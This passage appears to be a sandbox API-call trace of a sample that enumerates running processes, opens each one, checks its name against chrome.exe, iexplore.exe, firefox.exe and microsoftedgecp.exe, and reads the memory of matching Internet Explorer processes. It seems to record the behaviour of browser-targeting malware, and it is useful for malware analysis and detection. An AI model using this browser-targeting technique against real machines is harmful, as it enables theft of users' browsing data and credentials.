	[0252.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa60c
	[0252.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.487] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0252.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.488] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.488] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0252.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.488] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.489] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0252.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa610
	[0252.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.490] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0252.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.490] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.491] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0252.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.491] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.491] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0252.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa614
	[0252.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.492] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0252.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.493] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.493] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0252.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.493] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.493] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0252.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa618
	[0252.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.494] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0252.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.494] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.495] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0252.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.495] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.495] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0252.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa61c
	[0252.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.496] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0252.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.497] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.497] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0252.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.498] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.498] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0252.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa620
	[0252.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.499] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0252.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.499] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.500] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0252.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.501] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.501] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0252.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa624
	[0252.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.502] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0252.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.504] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.504] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0252.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.504] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.505] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0252.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa628
	[0252.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.506] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0252.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.506] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.507] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0252.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.508] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.508] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0252.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa62c
	[0252.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.509] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0252.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.510] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.510] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0252.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.511] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.511] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0252.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa630
	[0252.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.512] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0252.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.512] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0252.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.512] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0252.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.513] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.513] NtQueryInformationProcess (in: ProcessHandle=0xa630, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0252.513] ReadProcessMemory (in: hProcess=0xa630, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0252.513] ReadProcessMemory (in: hProcess=0xa630, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0252.513] ReadProcessMemory (in: hProcess=0xa630, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0252.514] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0252.514] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0252.514] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa634
	[0252.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.515] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0252.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.515] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0252.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.515] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0252.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.515] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.516] NtQueryInformationProcess (in: ProcessHandle=0xa634, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0252.516] ReadProcessMemory (in: hProcess=0xa634, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0252.516] ReadProcessMemory (in: hProcess=0xa634, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0252.516] ReadProcessMemory (in: hProcess=0xa634, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0252.516] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0252.516] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0252.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa638
	[0252.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.517] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0252.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.517] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.518] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0252.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.518] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.519] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0252.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa63c
	[0252.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.519] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0252.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.520] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.520] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0252.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.521] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.521] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa640
	[0252.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.522] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.522] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.522] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.523] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.524] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa644
	[0252.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.525] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.525] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.525] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.525] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.526] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa648
	[0252.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.527] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.527] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.527] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.528] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.528] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0252.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa64c
	[0252.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.529] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0252.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.529] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.529] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0252.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.530] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.530] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa650
	[0252.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.531] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.531] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.531] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.532] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa654
	[0252.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.533] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.534] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.534] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.534] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.534] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0252.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa658
	[0252.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.535] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0252.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.536] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.536] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0252.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.536] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.536] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0252.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa65c
	[0252.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.537] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.538] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.538] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.538] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0252.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa660
	[0252.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.539] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0252.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.540] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.540] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0252.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.540] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa664
	[0252.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.541] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.542] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.542] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
